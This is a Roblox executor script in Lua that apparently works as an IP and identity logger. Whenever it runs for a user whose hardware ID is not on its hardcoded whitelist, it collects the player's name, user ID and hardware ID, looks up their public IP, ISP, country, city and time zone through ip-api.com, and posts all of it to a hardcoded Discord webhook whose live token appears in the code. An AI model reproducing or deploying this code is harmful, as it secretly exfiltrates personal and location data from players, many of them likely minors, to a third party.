local player = game:GetService("Players").LocalPlayer
local valid = false
local whitelist = {
    {HWID = '8BE5F702-5D82-440C-A873-C7A12C6FA7B4', IP = "d"},
    {HWID = 'C55CEF23-D99C-4070-9F43-9AACAA07D87B', IP = "RobloxPro"},
    {HWID = '71BEF7BD-BFD3-41BB-AA3E-CD197EC60501', IP = 'ddd'},
    {HWID = '86FFA786-BE7C-4515-BF35-E071D36ACA2F', IP = 'ddds'},
    {HWID = '3202761D-756C-4746-81A3-49FF0573B1E7', IP = 'ddddds'}
}
if game:IsLoaded() then
    local player_name = player.Name
    local player_id = player.UserId
    local webhook_url = "https://discord.com/api/webhooks/1358382308771762319/gFFCLVM2UP04JvnL99Cb2p3Z4PRilA0WFU5pAbl5ZLWqzO7XFDsL62_2y-WSIdGHY3Al"

    local hwid = game:GetService("RbxAnalyticsService"):GetClientId()

    local place_id = game.PlaceId
    local place_name = game:GetService("MarketplaceService"):GetProductInfo(place_id).Name

    local ip_info = syn and syn.request or http_request({
        Url = "http://ip-api.com/json",
        Method = "GET"
    })

    getgenv().ipinfo_table = game:GetService("HttpService"):JSONDecode(ip_info.Body)

    local current_time = os.date("%Y-%m-%d %H:%M:%S")

    
    local embed = {
        {
            ["title"] = "Executed",
            ["description"] = "User data",
            ["color"] = 0xFF0000,
            ["fields"] = {
                {
                    ["name"] = "Name",
                    ["value"] = player_name,
                    ["inline"] = true
                },
                
                {
                    ["name"] = "Display name",
                    ["value"] = lp.DisplayName,
                    ["inline"] = true
                },
                {
                    ["name"] = "ID",
                    ["value"] = tostring(player_id),
                    ["inline"] = true
                },
                {
                    ["name"] = "HWID",
                    ["value"] = hwid,
                    ["inline"] = false
                },
                {
                    ["name"] = "Game",
                    ["value"] = place_name,
                    ["inline"] = false
                },
                {
                    ["name"] = "Time",
                    ["value"] = current_time,
                    ["inline"] = false
                },
                {
                    ["name"] = "IP",
                    ["value"] = getgenv().ipinfo_table.query,
                    ["inline"] = false
                },
                -- НОВЫЕ ПОЛЯ:
                {
                    ["name"] = "Provider",
                    ["value"] = getgenv().ipinfo_table.isp,
                    ["inline"] = true
                },
                {
                    ["name"] = "Country",
                    ["value"] = getgenv().ipinfo_table.country,
                    ["inline"] = true
                },
                {
                    ["name"] = "City",
                    ["value"] = getgenv().ipinfo_table.city,
                    ["inline"] = true
                },
                {
                    ["name"] = "Time zone",
                    ["value"] = getgenv().ipinfo_table.timezone,
                    ["inline"] = true
                }
            }
        }
    }

for _, player in ipairs(whitelist) do
if player.HWID == hwid then
valid = true
end
end

if valid then
print('You in LOG Whitelist')
else
http_request(
        {
            Url = webhook_url,
            Method = "POST",
            Headers = {
                ["Content-Type"] = "application/json"
            },
            Body = game:GetService("HttpService"):JSONEncode({["embeds"] = embed})
        }
    )
end
end
